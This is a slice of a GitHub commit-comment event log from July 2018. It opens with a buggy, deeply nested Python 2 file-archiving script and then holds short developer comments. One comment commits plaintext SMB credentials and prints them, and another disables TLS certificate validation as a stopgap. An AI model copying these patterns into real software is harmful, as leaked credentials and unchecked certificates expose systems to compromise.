staging_path):\r\n    \"\"\" Function to move old files to Staging directory \"\"\"\r\n\r\n    print \"\\nMoving old files from \" + str(path) + \" directory to Staging directory...\"\r\n\r\n    global cnt\r\n    global total_size\r\n    global log_file_list \r\n\r\n    f1 = 0\r\n    f2 = 0\r\n    f3 = 0\r\n    f4 = 0   \r\n    f5 = 0\r\n    f6 = 0\r\n\r\n    print \"===== \" + str(path) + \" ======\"\r\n    sub_dir1 = os.listdir(path)\r\n\r\n    for sub1 in sub_dir1:\r\n        if os.path.isdir(join(path,sub1)):\r\n            f1 += 1\r\n    if f1 == 0:\r\n        for sub1 in sub_dir1:\r\n            if os.path.isfile(join(path,sub1)):\r\n                staging_datadir = check_date(join(path, sub1), 1)   \r\n                if staging_datadir == False:\r\n                    staging_datadir = \"\"\r\n                else:\r\n                    try:\r\n                        os.stat(join(staging_path, staging_datadir))\r\n                    except:\r\n                        os.mkdir(join(staging_path, staging_datadir))\r\n                    try:\r\n                        os.stat(join(staging_path, staging_datadir, path))\r\n                    except:\r\n                        os.mkdir(join(staging_path, staging_datadir, path))                 \r\n    \r\n                    cnt += 1\r\n                    total_size += os.path.getsize(join(path, sub1))\r\n                    log_file_list.append(join(path, sub1))                \r\n        shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))           \r\n    else:\r\n        for sub1 in sub_dir1:\r\n            if os.path.isdir(join(path, sub1)):     \r\n                sub_dir2 = os.listdir(join(path, sub1))\r\n                for sub2 in sub_dir2:\r\n                    if os.path.isdir(join(path, sub1, sub2)):                \r\n                        f2 += 1\r\n        if f2 == 0:\r\n            for sub1 in sub_dir1:\r\n                if os.path.isdir(join(path, sub1)):    \r\n                    sub_dir2 = os.listdir(join(path, sub1))\r\n                    for sub2 in sub_dir2:\r\n                        if os.path.isfile(join(path, sub1, sub2)):\r\n                            staging_datadir = check_date(join(path, sub1, sub2), 1)   \r\n                            if staging_datadir == False:\r\n                                staging_datadir = \"\"\r\n                            else:\r\n                                try:\r\n                                    os.stat(join(staging_path, staging_datadir))\r\n                                except:\r\n                                    os.mkdir(join(staging_path, staging_datadir))                        \r\n                                try:\r\n                                    os.stat(join(staging_path, staging_datadir, path))\r\n                                except:\r\n                                    os.mkdir(join(staging_path, staging_datadir, path))                                 \r\n                                cnt += 1\r\n                                total_size += os.path.getsize(join(path, sub1, sub2))\r\n                                log_file_list.append(join(path, sub1, sub2))                             \r\n                    shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))                        \r\n        else:\r\n            for sub1 in sub_dir1:\r\n                if os.path.isdir(join(path, sub1)):     \r\n                    sub_dir2 = os.listdir(join(path, sub1))\r\n                    for sub2 in sub_dir2:\r\n                        if os.path.isdir(join(path, sub1, sub2)): \r\n                            sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                            for sub3 in sub_dir3:\r\n                                if os.path.isdir(join(path, sub1, sub2, sub3)):                                              \r\n                                    f3 += 1           \r\n\r\n            if f3 == 0:\r\n                for sub2 in sub_dir2:\r\n                    if os.path.isdir(join(path, sub1, sub2)):            \r\n                        sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                        for sub3 in sub_dir3:\r\n                            if os.path.isfile(join(path, sub1, sub2, sub3)):\r\n                                staging_datadir = check_date(join(path, sub1, sub2, sub3), 1)   \r\n                                if staging_datadir == False:\r\n                                    staging_datadir = \"\"\r\n                                else:\r\n                                    try:\r\n                                        os.stat(join(staging_path, staging_datadir))\r\n                                    except:\r\n                                        os.mkdir(join(staging_path, staging_datadir))                                    \r\n                                    try:\r\n                                        os.stat(join(staging_path, staging_datadir, path))\r\n                                    except:\r\n                                        os.mkdir(join(staging_path, staging_datadir, path))                             \r\n                                    cnt += 1  \r\n                                    total_size += os.path.getsize(join(path, sub1, sub2, sub3))\r\n                                    log_file_list.append(join(path, sub1, sub2, sub3))                                         \r\n                        shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))            \r\n            else:\r\n                for sub1 in sub_dir1:\r\n                    if os.path.isdir(join(path, sub1)):     \r\n                        sub_dir2 = os.listdir(join(path, sub1))\r\n                        for sub2 in sub_dir2:\r\n                            if os.path.isdir(join(path, sub1, sub2)): \r\n                                sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                for sub3 in sub_dir3:\r\n                                    if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                        sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                        for sub4 in sub_dir4:\r\n                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):                                                  \r\n                                                f4 += 1\r\n                if f4 == 0:\r\n                    for sub3 in sub_dir3:\r\n                        if os.path.isfile(join(path, sub1, sub2, sub3)):                    \r\n                            sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                            for sub4 in sub_dir4:\r\n                                if os.path.isfile(join(path, sub1, sub2, sub3, sub4)):\r\n                                    staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4), 1)   \r\n                                    if staging_datadir == False:\r\n                                        staging_datadir = \"\"\r\n                                    else:\r\n                                        try:\r\n                                            os.stat(join(staging_path, staging_datadir))\r\n                                        except:\r\n                                            os.mkdir(join(staging_path, staging_datadir))                                                \r\n                                        try:\r\n                                            os.stat(join(staging_path, staging_datadir, path))\r\n                                        except:\r\n                                            os.mkdir(join(staging_path, staging_datadir, path))                             \r\n                                        cnt += 1  \r\n                                        total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4))\r\n                                        log_file_list.append(join(path, sub1, sub2, sub3, sub4))                                                     \r\n                            shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))                                            \r\n                else:\r\n                    for sub1 in sub_dir1:\r\n                        if os.path.isdir(join(path, sub1)):     \r\n                            sub_dir2 = os.listdir(join(path, sub1))\r\n                            for sub2 in sub_dir2:\r\n                                if os.path.isdir(join(path, sub1, sub2)): \r\n                                    sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                    for sub3 in sub_dir3:\r\n                                        if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                            sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                            for sub4 in sub_dir4:\r\n                                                if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):     \r\n                                                    sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                                    for sub5 in sub_dir5:\r\n                                                        if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):                                                         \r\n                                                            f5 += 1\r\n                    if f5 == 0:\r\n                        for sub4 in sub_dir4:\r\n                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):                    \r\n                                sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                for sub5 in sub_dir5:\r\n                                    if os.path.isfile(join(path, sub1, sub2, sub3, sub4, sub5)):\r\n                                        staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4, sub5), 1)   \r\n                                        if staging_datadir == False:\r\n                                            staging_datadir = \"\"\r\n                                        else:\r\n                                            try:\r\n                                                os.stat(join(staging_path, staging_datadir))\r\n                                            except:\r\n                                                os.mkdir(join(staging_path, staging_datadir))                                                            \r\n                                            try:\r\n                                                os.stat(join(staging_path, staging_datadir, path))\r\n                                            except:\r\n                                                os.mkdir(join(staging_path, staging_datadir, path))                \r\n                                            cnt += 1     \r\n                                            total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                            log_file_list.append(join(path, sub1, sub2, sub3, sub4, sub5))                                                                 \r\n                                shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))                        \r\n                    else:\r\n                        for sub1 in sub_dir1:\r\n                            if os.path.isdir(join(path, sub1)):     \r\n                                sub_dir2 = os.listdir(join(path, sub1))\r\n                                for sub2 in sub_dir2:\r\n                                    if os.path.isdir(join(path, sub1, sub2)): \r\n                                        sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                        for sub3 in sub_dir3:\r\n                                            if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                                sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                                for sub4 in sub_dir4:\r\n                                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):     \r\n                                                        sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                                        for sub5 in sub_dir5:\r\n                                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):   \r\n                                                                sub_dir6 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                                                for sub6 in sub_dir6:\r\n                                                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):                                                                   \r\n                                                                        f6 += 1\r\n                        if f6 == 0:\r\n                            for sub5 in sub_dir5:\r\n                                if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):                    \r\n                                    sub_dir6 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                    for sub6 in sub_dir6:\r\n                                        if os.path.isfile(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):\r\n                                            staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4, sub5, sub6), 1)   \r\n                                            if staging_datadir == False:\r\n                                                staging_datadir = \"\"\r\n                                            else:\r\n                                                try:\r\n                                                    os.stat(join(staging_path, staging_datadir))\r\n                                                except:\r\n                                                    os.mkdir(join(staging_path, staging_datadir))                                                                           \r\n                                                try:\r\n                                                    os.stat(join(staging_path, staging_datadir, path))\r\n                                                except:\r\n                                                    os.mkdir(join(staging_path, staging_datadir, path))                \r\n                                                cnt += 1   \r\n                                                total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4, sub5, sub6))\r\n                                                log_file_list.append(join(path, sub1, sub2, sub3, sub4, sub5, sub6))                                                                             \r\n                                    shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))   \r\n\r\ndef get_Archiving(archiving_path):\r\n    total_size = 0\r\n    files = os.listdir(archiving_path)\r\n    if len(files) > 0:\r\n        for i in files:\r\n            total_size += os.path.getsize(join(archiving_path, i))\r\n    print \"Counts : \" + str(len(files))\r\n    print \"Size   : \" + str(total_size)\r\n    return len(files), total_size    \r\n    \r\n\r\ndef prepare_compression(staging_path, archiving_path):\r\n    \"\"\" function to compress as Gzip file and  move into Archiving directory \"\"\"\r\n\r\n    print \"Compressing gzip files and move into Archiving directory...\"\r\n    \r\n    # Get the counts and size of files of Archiving that before compression.\r\n    print \"Current files of Archiving\" \r\n    before_counts, before_size = get_Archiving(archiving_path)\r\n    \r\n    # Get all files of Staging directory\r\n    files = os.listdir(staging_path)\r\n    global cnt\r\n    global total_size\r\n    global log_file_list\r\n    log_file_list = []\r\n    for f in files:\r\n        if isfile(join(staging_path, f)):\r\n            continue\r\n\r\n        if not validate_file(f):\r\n            continue\r\n\r\n        # Remove directory from Staging\r\n        if not check_date(join(staging_path, f), 2):\r\n            continue\r\n\r\n        # Compress as Gzip file and move to Archiving directory\r\n        gzpath = join(archiving_path, f) + '.tar.gz'\r\n        f_out = tarfile.open(gzpath, 'w:gz')\r\n        f_out.add(join(staging_path, f), arcname = f)\r\n        f_out.close()\r\n        total_size += os.path.getsize(gzpath)\r\n        log_file_list.append(f+'.tar.gz')\r\n    \r\n    # Get the counts and size of files of Archiving that after compression.\r\n    print \"Check the compressed state\"\r\n    after_counts, after_size = get_Archiving(archiving_path)    \r\n    if after_counts > before_counts and after_size > before_size:\r\n        shutil.rmtree(join(staging_path, f))\r\n\r\ndef logging_file(flag):\r\n    \"\"\" Function to save logging information \"\"\"\r\n\r\n    global cnt\r\n    global total_size\r\n    global log_file_list    \r\n    global is_new\r\n\r\n    # Logging filename\r\n    log_filename = \"history.log\"\r\n\r\n    # Open log file\r\n    try:\r\n        f = open(log_filename, 'a')\r\n    except IOError:\r\n        os.stat(log_filename)\r\n\r\n    # Write head info\r\n    if is_new == True:\r\n        print >> f, '\\n--------------- ' + str(datetime.now().date()) + ' ' + str(datetime.now().strftime(\"%H:%M:%S\")) + ' ---------------\\n'\r\n        is_new = False\r\n\r\n    if flag == 1:        \r\n        print >> f, str(cnt) + ' files (' + str(total_size/1000000.0) +' MB) are moved from Data to Staging directory: '\r\n\r\n    else:\r\n        print >> f, str(total_size/1000000.0) +' MB and moved from Staging to Archiving directory: '\r\n    print >> f, ''\r\n\r\n    # Write archiving data filename\r\n    print >> f, ''\r\n    for log_file in log_file_list:\r\n        print >> f, '\\t' + str(log_file)\r\n\r\n    print >> f, ''\r\n\r\n    logging.shutdown()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    # Source directory path\r\n    staging_path = \"Staging\"\r\n    archiving_path = \"Archiving\"\r\n\r\n    cnt = 0\r\n    total_size = 0\r\n    log_file_list = []\r\n\r\n    # Get all data directories\r\n    data_path_list = [\"Data\", \"Ftp\", \"Mi\"]\r\n    for data_path in data_path_list:\r\n        # Move files from data to staging directory\r\n        move_staging(data_path, staging_path)\r\n\r\n    # Logging for Staging state\r\n    if cnt > 0:\r\n        logging_file(1)\r\n\r\n    # Compress and move gzip files from staging to archiving\r\n    prepare_compression(staging_path, archiving_path)\r\n\r\n    # Logging for Archiving state\r\n    if cnt > 0:\r\n        logging_file(2)\r\n\r\n    print \"\\nComplete successfully!\"\r\n"}},"created_at":"2018-07-04T09:41:04Z"}
{"id":"7917389181","type":"CommitCommentEvent","actor":{"login":"AdotDal"},"repo":{"name":"AdotDal/Gallant"},"payload":{"comment":{"id":29592463,"position":null,"line":null,"path":null,"commit_id":"47aef5b3ac729eb75247824ae623aa7be905314f","created_at":"2018-07-04T09:41:25Z","updated_at":"2018-07-04T09:41:25Z","author_association":"OWNER","body":"import ConfigParser\r\n#import tempfile\r\n#from smb.SMBConnection import SMBConnection\r\n#from nmb.NetBIOS import NetBIOS\r\n\r\n# Reading config file\r\nconfig = ConfigParser.ConfigParser()\r\nconfig.read('SMBConnection.ini')\r\n\r\n# Getting data in the section\r\n\r\nusername = config.get('data', 'username')   \r\npassword = config.get('data', 'password')   \r\nserver_ip = config.get('data', 'server_ip')   \r\nserver_name = config.get('data', 'server_name')   \r\nport = int(config.get('data', 'port')) \r\n\r\nprint username, \"\\n\", password, \"\\n\", server_ip, \"\\n\", server_name, \"\\n\", port\r\n\r\n\"\"\"\r\n# UNTESTED\r\nconn = SMBConnection(username,\r\n                     password,\r\n                     server_ip,\r\n                     server_name,\r\n                     use_ntlm_v2 = True)\r\nassert conn.connect(server_ip, port)\r\nwith open('local_file', 'wb') as fp:\r\n    conn.retrieveFile('share', '/path/to/remote_file', fp)\r\n\"\"\"\r\n"}},"created_at":"2018-07-04T09:41:25Z"}
{"id":"7917391369","type":"CommitCommentEvent","actor":{"login":"AlexWayfer"},"repo":{"name":"zhiwenhuang/audio-equalizer-chrome"},"payload":{"comment":{"id":29592469,"position":null,"line":null,"path":null,"commit_id":"bb534b5fbec59abe634dce888709f5a7fbd84a89","created_at":"2018-07-04T09:41:50Z","updated_at":"2018-07-04T09:41:50Z","author_association":"NONE","body":"Customization of frequency and height was very helpful for me (I don't like 33Hz, 100–200Hz is better for me).\r\n\r\nYou can hide all these button in additional like \"options\", which will toggle their displaying right after it:\r\n\r\n![image](https://user-images.githubusercontent.com/6510020/42269686-80ae74e8-7f87-11e8-9bef-90a25aab21c0.png)\r\n"}},"created_at":"2018-07-04T09:41:50Z"}
{"id":"7917392244","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"cognard/phpmyadmin"},"payload":{"comment":{"id":29592472,"position":null,"line":null,"path":null,"commit_id":"64eba51ac9cb6441eef996dbace35d5f82002c2b","created_at":"2018-07-04T09:42:00Z","updated_at":"2018-07-04T09:42:00Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-04T09:42:00Z"}
{"id":"7917393193","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/storytelling-with-git"},"payload":{"comment":{"id":29592474,"position":null,"line":null,"path":null,"commit_id":"2188eca91077804f95ded4c75dd8d55665deacfe","created_at":"2018-07-04T09:42:12Z","updated_at":"2018-07-04T09:42:12Z","author_association":"OWNER","body":"### **Awareness (Is this for me?)**\r\nHow this works: We become aware of possibilities through conversations in networks. We start considering whether these possibilities are right for us.\r\n\r\n### **Discovery (How is this for me?)**\r\nHow this works: We do something to test whether something is for us. A short entry nano-project can help us take that first step to decide whether something is for us and set playing it forward in motion.\r\n\r\n### **Direction (What nano-projects can I do next?)**\r\nHow this works: We do nano-projects and share it in our networks for feedback (playing it forward). Feedback helps find our direction (decide on nano-projects that are doable and worth doing)\r\n\r\n### **Integration (How can I use existing resources to do the nano-project?)**\r\nHow this works: We seek ways to use resources from past nano, micro, and macro projects to do new projects. We continue playing it forward to seek feedback.\r\n\r\n### **Transformation (What impact will this nano-project have on micro and macro projects?)**\r\nHow this works: We start picturing the impacts of selected nano-projects. How will these nano-projects contribute to our micro and macro-projects?\r\n\r\n### **Initiating (Which nano-project do I start next?)**\r\nHow this works: We start a nano-project that is most likely to build capacity and generate resources. We start nano-projects with clear success criteria that can be achieved in a short time.\r\n\r\n### **Adapting (How do I complete the selected nano-project?)**\r\nHow this works: We use existing resources to complete the nano-project based on success criteria.\r\n\r\n### **Sustaining (How can I continue my micro and macro projects?)**\r\nHow this works: Successful nano-projects build capacity and generate resources that can be used to continue our work on micro and macro-projects.\r\n\r\n### **Extending (How can I extend this nano-project?)**\r\nHow this works: Successful nano-projects trigger ideas for other nano-projects that become doable once the current nano-project is done."}},"created_at":"2018-07-04T09:42:12Z"}
{"id":"7917394468","type":"CommitCommentEvent","actor":{"login":"himan085"},"repo":{"name":"himan085/Face-detection-and-Distance-Calculation"},"payload":{"comment":{"id":29592477,"position":null,"line":null,"path":null,"commit_id":"715fd62898aa7d39531817753ddf40f18eb491dd","created_at":"2018-07-04T09:42:26Z","updated_at":"2018-07-04T09:42:26Z","author_association":"OWNER","body":"Extract this zip file and place it in the root directory of your project."}},"created_at":"2018-07-04T09:42:26Z"}
{"id":"7917394913","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/classic-db"},"payload":{"comment":{"id":29592482,"position":null,"line":null,"path":null,"commit_id":"c6cece0d7e350306902b9e9678c88e78b166982f","created_at":"2018-07-04T09:42:31Z","updated_at":"2018-07-04T09:42:31Z","author_association":"COLLABORATOR","body":"Script and waypoint data provided by the All Mighty @Tobschinski "}},"created_at":"2018-07-04T09:42:31Z"}
{"id":"7917395244","type":"CommitCommentEvent","actor":{"login":"AdotDal"},"repo":{"name":"AdotDal/Gallant"},"payload":{"comment":{"id":29592483,"position":null,"line":null,"path":null,"commit_id":"47aef5b3ac729eb75247824ae623aa7be905314f","created_at":"2018-07-04T09:42:34Z","updated_at":"2018-07-04T09:42:34Z","author_association":"OWNER","body":"[data]\r\nusername = Phai\r\npassword = admin123test\r\nserver_ip = 192.168.14.1\r\nserver_name = SERVER\r\nport = 139\r\n"}},"created_at":"2018-07-04T09:42:34Z"}
{"id":"7917408661","type":"CommitCommentEvent","actor":{"login":"AmedeeBulle"},"repo":{"name":"PaulNeumann/vagrant-boxes"},"payload":{"comment":{"id":29592511,"position":6,"line":24,"path":"OracleDatabase/12.2.0.1/Vagrantfile","commit_id":"b86d0d2e1083a4a896935c1a7f83af9e3be3b105","created_at":"2018-07-04T09:44:56Z","updated_at":"2018-07-04T09:44:56Z","author_association":"NONE","body":"Couple of notes here:\r\n- any reason for not using `Time.now.gmt_offset`? I __think__ it would do the same and does not require `time`.\r\n- this does not work for India (or any country not having a full hour offset) as we do integer math (`Time.now.gmt_offset` is 19800 which is 5:30 hours) \r\n- even if we do float math it won't work as `Etc/GMT` only accepts integer offsets\r\n\r\nI don't think there is an easy solution for this, maybe we could just fall back on UTC in these cases -- user can still override if needed."}},"created_at":"2018-07-04T09:44:56Z"}
{"id":"7917408909","type":"CommitCommentEvent","actor":{"login":"khaibnd"},"repo":{"name":"khaibnd/HFS-LS-II-VI"},"payload":{"comment":{"id":29592513,"position":4,"line":47,"path":"run.mod","commit_id":"3fb6034022806e1fd3ef365c7c588d20bb38b038","created_at":"2018-07-04T09:44:59Z","updated_at":"2018-07-04T09:44:59Z","author_association":"OWNER","body":"Thêm biến xác định setup time cho part hay không?"}},"created_at":"2018-07-04T09:44:59Z"}
{"id":"7917417095","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29592544,"position":null,"line":null,"path":null,"commit_id":"b8b9a93158c84175e809d61608bcdf20127f80e0","created_at":"2018-07-04T09:46:28Z","updated_at":"2018-07-04T09:46:28Z","author_association":"MEMBER","body":"They where planned to be removed for a while, that's why users couldn't submit them anymore"}},"created_at":"2018-07-04T09:46:28Z"}
{"id":"7917420010","type":"CommitCommentEvent","actor":{"login":"adamgibbins"},"repo":{"name":"tim-group/stackbuilder"},"payload":{"comment":{"id":29592558,"position":null,"line":null,"path":null,"commit_id":"49079519bfca7d77dcc3949b91c6040632608b2c","created_at":"2018-07-04T09:47:00Z","updated_at":"2018-07-04T09:47:00Z","author_association":"MEMBER","body":"Merge? What'd you take us for - this went to prod 3s later."}},"created_at":"2018-07-04T09:47:00Z"}
{"id":"7917421236","type":"CommitCommentEvent","actor":{"login":"arturo182"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29592563,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T09:47:14Z","updated_at":"2018-07-04T09:47:14Z","author_association":"COLLABORATOR","body":"This is getting interesting :)"}},"created_at":"2018-07-04T09:47:14Z"}
{"id":"7917425013","type":"CommitCommentEvent","actor":{"login":"hoatructhanhlam"},"repo":{"name":"nativescript-vue/nativescript-vue"},"payload":{"comment":{"id":29592579,"position":null,"line":null,"path":null,"commit_id":"23002242ef947dfe10277ea93c95faa7e5b8f2be","created_at":"2018-07-04T09:47:56Z","updated_at":"2018-07-04T09:47:56Z","author_association":"NONE","body":"I test with vue-cli-template seem error manual routing and actionbar"}},"created_at":"2018-07-04T09:47:56Z"}
{"id":"7917429686","type":"CommitCommentEvent","actor":{"login":"KaoCC"},"repo":{"name":"KaoCC/AutoScript"},"payload":{"comment":{"id":29592588,"position":null,"line":null,"path":null,"commit_id":"966c6e3bf87d33c200e5e8642744820d8d586e47","created_at":"2018-07-04T09:48:49Z","updated_at":"2018-07-04T09:48:49Z","author_association":"OWNER","body":"#6 "}},"created_at":"2018-07-04T09:48:49Z"}
{"id":"7917434340","type":"CommitCommentEvent","actor":{"login":"cfbgc"},"repo":{"name":"apache/drill"},"payload":{"comment":{"id":29592596,"position":13,"line":66,"path":"exec/jdbc/src/main/java/org/apache/drill/jdbc/impl/DriverImpl.java","commit_id":"13f21e14b4f0832abba8e5632d8fa4e7a6a27635","created_at":"2018-07-04T09:49:43Z","updated_at":"2018-07-04T09:49:43Z","author_association":"NONE","body":"DrillVersionInfo is not found"}},"created_at":"2018-07-04T09:49:43Z"}
{"id":"7917438537","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592603,"position":1,"line":1,"path":"tests/qgraph/qgraph.h","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T09:50:28Z","updated_at":"2018-07-04T09:50:28Z","author_association":"NONE","body":"Please call the guard QGRAPH_H."}},"created_at":"2018-07-04T09:50:28Z"}
{"id":"7917439406","type":"CommitCommentEvent","actor":{"login":"yidali-code"},"repo":{"name":"yidali/here"},"payload":{"comment":{"id":29592605,"position":null,"line":null,"path":null,"commit_id":"1419c840cf3ea3262520e5a580aa9a92e21cae04","created_at":"2018-07-04T09:50:37Z","updated_at":"2018-07-04T09:50:37Z","author_association":"NONE","body":"我是 任何一个人"}},"created_at":"2018-07-04T09:50:37Z"}
{"id":"7917447143","type":"CommitCommentEvent","actor":{"login":"akoshlatyy-vareger"},"repo":{"name":"synechron-finlabs/quorum-maker"},"payload":{"comment":{"id":29592631,"position":null,"line":null,"path":null,"commit_id":"c48466c213509b0e6186f7ebe8fd1e7466dc0d19","created_at":"2018-07-04T09:52:04Z","updated_at":"2018-07-04T09:52:04Z","author_association":"NONE","body":"UPD:\r\nI have used your latest version from the master branch, and changed 2 files:\r\n./lib/master/start_quorum_template.sh\r\n./lib/slave/start_quorum_template.sh\r\nI put  \r\n`--tlsservertrust=insecure-no-validation \\`\r\n`--tlsclienttrust=insecure-no-validation \\`\r\nInstead of:\r\n`--tls=off \\`\r\nAnd constellation node generated files:\r\n`tls-client-cert.pem`\r\n`tls-client-key.pem`\r\n`tls-known-clients`\r\n`tls-known-servers`\r\n`tls-server-cert.pem`\r\n`tls-server-key.pem`\r\nHere are Self-Signed certs. Everyting works well. \r\nNow we need to change these parameters to \r\n`--tlsservertrust=ca`\r\n`--tlsclienttrust=ca`\r\nand put there 2 additional parameters: \r\n`--tlsservercert=`\r\n`--tlsclienttrust=` and add possibilities to ask domain name instead of IP during the interactive setup process.\r\nAnd, if I'm not mistaking, change parameter \r\n`--url=http://$CURRENT_NODE_IP:$C_PORT/ \\`\r\nto \r\n`--url=https://$DOMAIN_NAME:$C_PORT/ \\`"}},"created_at":"2018-07-04T09:52:04Z"}
{"id":"7917447493","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29592632,"position":null,"line":null,"path":null,"commit_id":"506855ceaba9998b58e453321226b4ae1320cd5d","created_at":"2018-07-04T09:52:08Z","updated_at":"2018-07-04T09:52:08Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2846 of 2970 tests passed, 42 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 109 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 123 tests had: Table big diffs.\n * 89 tests had: MTR small diffs.\n * 92 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 7 tests had: ERR diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 519\n * Failed: 124\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-95.82%25-yellow.png)</a> \n"}},"created_at":"2018-07-04T09:52:08Z"}
{"id":"7917453238","type":"CommitCommentEvent","actor":{"login":"akoshlatyy-vareger"},"repo":{"name":"synechron-finlabs/quorum-maker"},"payload":{"comment":{"id":29592642,"position":null,"line":null,"path":null,"commit_id":"c48466c213509b0e6186f7ebe8fd1e7466dc0d19","created_at":"2018-07-04T09:53:12Z","updated_at":"2018-07-04T09:53:12Z","author_association":"NONE","body":"UPD:\r\nI have used your latest version from the master branch, and changed 2 files:\r\n./lib/master/start_quorum_template.sh\r\n./lib/slave/start_quorum_template.sh\r\nI put  \r\n`--tlsservertrust=insecure-no-validation \\`\r\n`--tlsclienttrust=insecure-no-validation \\`\r\nInstead of:\r\n`--tls=off \\`\r\nAnd constellation node generated files:\r\n`tls-client-cert.pem`\r\n`tls-client-key.pem`\r\n`tls-known-clients`\r\n`tls-known-servers`\r\n`tls-server-cert.pem`\r\n`tls-server-key.pem`\r\nEveryting works well. \r\nNow we need to change these parameters to \r\n`--tlsservertrust=ca`\r\n`--tlsclienttrust=ca`\r\nand put there 2 additional parameters: \r\n`--tlsservercert=`\r\n`--tlsclienttrust=` and add possibilities to ask domain name instead of IP.\r\nAnd, if I'm not mistaking, change "}},"created_at":"2018-07-04T09:53:12Z"}
{"id":"7917456516","type":"CommitCommentEvent","actor":{"login":"sirainen"},"repo":{"name":"dovecot/core"},"payload":{"comment":{"id":29592653,"position":null,"line":null,"path":null,"commit_id":"4ff4bd024a9b6e7973b76b186ce085c2ca669d3e","created_at":"2018-07-04T09:53:47Z","updated_at":"2018-07-04T09:53:47Z","author_association":"CONTRIBUTOR","body":"It didn't make it into v2.3.2 QA, so it'll be in v2.3.3.\r\n"}},"created_at":"2018-07-04T09:53:47Z"}
{"id":"7917456855","type":"CommitCommentEvent","actor":{"login":"Jan-E"},"repo":{"name":"Jan-E/v8js"},"payload":{"comment":{"id":29592654,"position":null,"line":null,"path":null,"commit_id":"0a12ac19d8afa13a435d23be05fa15b2931be67d","created_at":"2018-07-04T09:53:51Z","updated_at":"2018-07-04T09:53:51Z","author_association":"OWNER","body":"@cmb69 Thanks for the fix in https://externals.io/message/102338#102568"}},"created_at":"2018-07-04T09:53:51Z"}
{"id":"7917457850","type":"CommitCommentEvent","actor":{"login":"k3lt"},"repo":{"name":"davidtrpcevski/android_frameworks_base"},"payload":{"comment":{"id":29592655,"position":null,"line":null,"path":null,"commit_id":"4fcf26644f39db176440880ceafb41e56441d668","created_at":"2018-07-04T09:54:03Z","updated_at":"2018-07-04T09:54:03Z","author_association":"NONE","body":"Haven't tested yet but hopefully this fixes the \"no LTE signal\" icon every few minutes on Mido."}},"created_at":"2018-07-04T09:54:03Z"}
